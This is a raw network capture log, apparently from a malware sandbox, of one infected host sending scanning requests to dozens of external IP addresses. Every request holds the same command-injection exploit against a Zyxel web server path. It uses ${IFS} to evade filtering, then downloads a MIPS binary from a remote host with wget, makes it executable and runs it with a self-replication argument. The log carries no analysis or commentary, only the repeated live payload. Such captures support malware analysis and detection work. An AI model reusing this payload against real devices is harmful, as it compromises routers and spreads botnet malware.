                                                Jan 12, 2024 18:16:26.532212973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5324192.168.2.2356856135.211.90.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532231092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5325192.168.2.2358550107.153.226.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532279968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5326192.168.2.235264497.105.182.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532315016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5327192.168.2.2355826161.222.90.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532361031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5328192.168.2.2338872120.132.57.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532404900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5329192.168.2.2340460209.4.81.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532433987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5330192.168.2.2335702151.104.145.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532460928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5331192.168.2.234965088.26.136.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532485008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5332192.168.2.2354602107.241.148.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532521963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5333192.168.2.234879073.39.158.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532579899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5334192.168.2.234954425.113.65.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532599926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5335192.168.2.2337472220.209.5.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532638073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5336192.168.2.2335494166.97.69.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532670975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5337192.168.2.233667234.152.146.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532704115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5338192.168.2.2343584134.109.220.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532756090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5339192.168.2.2360532171.132.190.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532785892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5340192.168.2.233811698.18.146.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532813072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5341192.168.2.2348370169.20.132.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532865047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5342192.168.2.2349958153.206.31.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532890081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5343192.168.2.23334244.27.22.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532922983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5344192.168.2.234414082.96.2.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.532984018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5345192.168.2.234062069.156.0.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533008099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5346192.168.2.234464292.173.228.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533044100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5347192.168.2.2344894137.23.63.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533080101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5348192.168.2.2345810149.77.154.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533113003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5349192.168.2.235245650.244.159.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533133984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5350192.168.2.2344128119.1.219.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533159971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5351192.168.2.2341880149.48.8.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533202887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5352192.168.2.2338484113.24.220.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533233881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5353192.168.2.2339546221.20.101.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533283949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5354192.168.2.2337408182.16.155.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533329010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5355192.168.2.2353616172.108.208.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533354044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5356192.168.2.2346470105.79.25.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533404112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5357192.168.2.233624831.74.195.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533452988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5358192.168.2.2351066180.59.117.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533484936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5359192.168.2.2359908162.86.114.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533508062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5360192.168.2.2350030136.79.38.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533571959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5361192.168.2.2342562208.37.205.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533638000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5362192.168.2.2352954105.76.32.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.533660889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5363192.168.2.2350284211.168.227.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.534738064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5364192.168.2.2351284161.144.155.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.535461903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5365192.168.2.2343296139.5.83.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.535736084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5366192.168.2.234239076.8.215.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.536264896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5367192.168.2.235466858.148.87.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.536329031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5368192.168.2.235629247.140.89.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.536734104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5369192.168.2.235230858.85.156.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.536806107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5370192.168.2.2339710102.65.136.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.537412882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5371192.168.2.2346570107.129.24.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.537470102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5372192.168.2.235768480.16.128.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.537504911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5373192.168.2.2335252142.197.190.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.537549019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5374192.168.2.233888263.239.234.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.537600994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5375192.168.2.2357608143.246.187.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.537635088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5376192.168.2.2338434162.117.146.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.537662029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5377192.168.2.233912487.15.180.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.537731886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5378192.168.2.234781839.216.173.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.537753105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5379192.168.2.23504909.120.225.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.537798882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5380192.168.2.2334944174.43.243.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.553997040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5381192.168.2.235270688.20.79.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554018021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5382192.168.2.234015465.115.228.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554043055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5383192.168.2.234032451.52.251.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554079056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5384192.168.2.2356814152.4.29.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554100990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5385192.168.2.234300036.91.152.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554141998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5386192.168.2.2348850118.164.192.42443
                                                TimestampBytes transferredDirectionData
